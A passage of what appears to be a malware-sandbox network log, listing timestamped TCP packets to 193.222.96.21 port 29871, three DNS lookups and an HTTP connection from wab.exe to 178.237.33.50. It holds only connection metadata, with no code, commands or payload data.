Apr 19, 2024 10:59:13.724483013 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724503040 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724504948 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.724524021 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724544048 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724548101 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.724560022 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.724561930 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724581957 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724589109 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.724600077 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724618912 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724636078 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.724639893 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724654913 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.724658012 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724675894 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724694014 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724701881 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.724713087 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724734068 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724744081 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.724750996 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724769115 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724776983 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.724788904 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724806070 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724812984 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.724822998 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724842072 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724845886 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.724873066 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724883080 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.724910975 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724948883 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724956989 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.724986076 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725025892 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725028992 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.725064039 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725100994 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725106955 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.725140095 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725178957 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725183964 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.725219965 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725260019 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725265026 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.725297928 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725334883 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725339890 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.725372076 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725409985 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725414038 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.725449085 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725485086 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725512981 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.725528002 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725565910 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725570917 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.725604057 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725644112 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725647926 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.725681067 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725719929 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725723982 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.725773096 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725811958 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725819111 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.725851059 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725893021 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725897074 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.725930929 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725971937 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.725977898 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.726010084 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726051092 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726053953 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.726089954 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726129055 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.726128101 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726167917 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726207018 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726211071 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.726246119 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726289034 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726294994 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.726327896 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726370096 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726375103 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.726412058 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726449966 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726454973 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.726486921 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726526022 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726528883 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.726563931 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726603031 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726605892 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.726638079 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726679087 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726686001 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.726716042 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726754904 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726758957 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.726793051 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726830006 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726835966 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.726869106 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726906061 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726914883 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.726944923 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726984024 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.726989031 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.727021933 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727061033 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727061987 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.727101088 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727139950 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727143049 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.727178097 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727219105 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727221012 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.727257967 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727296114 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727300882 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.727333069 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727371931 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727376938 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.727408886 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727446079 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727447033 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.727483988 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727523088 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727528095 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.727560997 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727597952 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727598906 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.727637053 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727675915 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727682114 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.727714062 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727752924 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727757931 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.727791071 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727828026 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727834940 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.727865934 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727902889 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727941990 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727950096 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.727979898 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.727993011 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.728018045 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.728065014 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.728076935 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.728147984 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.728185892 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.728197098 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.728224993 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.728261948 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.728269100 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.728300095 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.728337049 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.728346109 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.728375912 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.728415012 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.728420019 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.728452921 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.728492022 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.728498936 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.728528976 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.728568077 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.728574038 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.728605032 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.728643894 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.728647947 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.728682041 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.728719950 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.728723049 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.728761911 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.728801012 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.728804111 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.728840113 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.728878975 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.728887081 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.728916883 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.728955984 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.728964090 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.728995085 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.729033947 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.729038954 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.729074955 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.729113102 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.729120016 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.768897057 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:17.541584969 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:17.740127087 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:17.740181923 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:17.740206003 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:17.740223885 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:17.741288900 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:17.938694000 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:17.938750982 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:17.938810110 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:17.942532063 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:17.942589045 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:40.815615892 CEST | 29871 | 49708 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:40.818394899 CEST | 49708 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:41.066019058 CEST | 29871 | 49708 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 11:00:11.818034887 CEST | 29871 | 49708 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 11:00:11.819816113 CEST | 49708 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 11:00:12.065826893 CEST | 29871 | 49708 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 11:00:42.566718102 CEST | 49710 | 80 | 192.168.2.7 | 178.237.33.50 |
Apr 19, 2024 11:00:42.922548056 CEST | 29871 | 49708 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 11:00:42.924886942 CEST | 49708 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 11:00:43.128525972 CEST | 49710 | 80 | 192.168.2.7 | 178.237.33.50 |
Apr 19, 2024 11:00:43.190654993 CEST | 29871 | 49708 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 11:00:44.195492029 CEST | 49710 | 80 | 192.168.2.7 | 178.237.33.50 |
Apr 19, 2024 11:00:46.331919909 CEST | 49710 | 80 | 192.168.2.7 | 178.237.33.50 |
Apr 19, 2024 11:00:50.628485918 CEST | 49710 | 80 | 192.168.2.7 | 178.237.33.50 |
Apr 19, 2024 11:00:59.034713984 CEST | 49710 | 80 | 192.168.2.7 | 178.237.33.50 |
Apr 19, 2024 11:01:13.847902060 CEST | 29871 | 49708 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 11:01:13.849476099 CEST | 49708 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 11:01:14.096684933 CEST | 29871 | 49708 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 11:01:15.722250938 CEST | 49710 | 80 | 192.168.2.7 | 178.237.33.50 |
Apr 19, 2024 11:01:43.899933100 CEST | 29871 | 49708 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 11:01:43.902209044 CEST | 49708 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 11:01:44.143481970 CEST | 29871 | 49708 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 11:02:14.961546898 CEST | 29871 | 49708 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 11:02:14.965960979 CEST | 49708 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 11:02:15.221488953 CEST | 29871 | 49708 | 193.222.96.21 | 192.168.2.7 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 19, 2024 10:59:09.491764069 CEST | 51495 | 53 | 192.168.2.7 | 1.1.1.1 |
Apr 19, 2024 10:59:09.807934046 CEST | 53 | 51495 | 1.1.1.1 | 192.168.2.7 |
Apr 19, 2024 10:59:11.285813093 CEST | 63230 | 53 | 192.168.2.7 | 1.1.1.1 |
Apr 19, 2024 10:59:11.426908970 CEST | 53 | 63230 | 1.1.1.1 | 192.168.2.7 |
Apr 19, 2024 10:59:12.126827955 CEST | 65467 | 53 | 192.168.2.7 | 1.1.1.1 |
Apr 19, 2024 10:59:12.230783939 CEST | 53 | 65467 | 1.1.1.1 | 192.168.2.7 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Apr 19, 2024 10:59:09.491764069 CEST | 192.168.2.7 | 1.1.1.1 | 0x694f | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 19, 2024 10:59:11.285813093 CEST | 192.168.2.7 | 1.1.1.1 | 0xd7b9 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 19, 2024 10:59:12.126827955 CEST | 192.168.2.7 | 1.1.1.1 | 0x9f4d | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Apr 19, 2024 10:59:09.807934046 CEST | 1.1.1.1 | 192.168.2.7 | 0x694f | No error (0) | 172.67.191.112 | A (IP address) | IN (0x0001) | false | ||
Apr 19, 2024 10:59:09.807934046 CEST | 1.1.1.1 | 192.168.2.7 | 0x694f | No error (0) | 104.21.60.38 | A (IP address) | IN (0x0001) | false | ||
Apr 19, 2024 10:59:11.426908970 CEST | 1.1.1.1 | 192.168.2.7 | 0xd7b9 | No error (0) | 193.222.96.21 | A (IP address) | IN (0x0001) | false | ||
Apr 19, 2024 10:59:12.230783939 CEST | 1.1.1.1 | 192.168.2.7 | 0x9f4d | No error (0) | 178.237.33.50 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.7 | 49710 | 178.237.33.50 | 80 | 7568 | C:\Program Files (x86)\Windows Mail\wab.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Apr 19, 2024 10:59:12.441730976 CEST | 71 | OUT | |
Apr 19, 2024 10:59:12.654450893 CEST | 1171 | IN |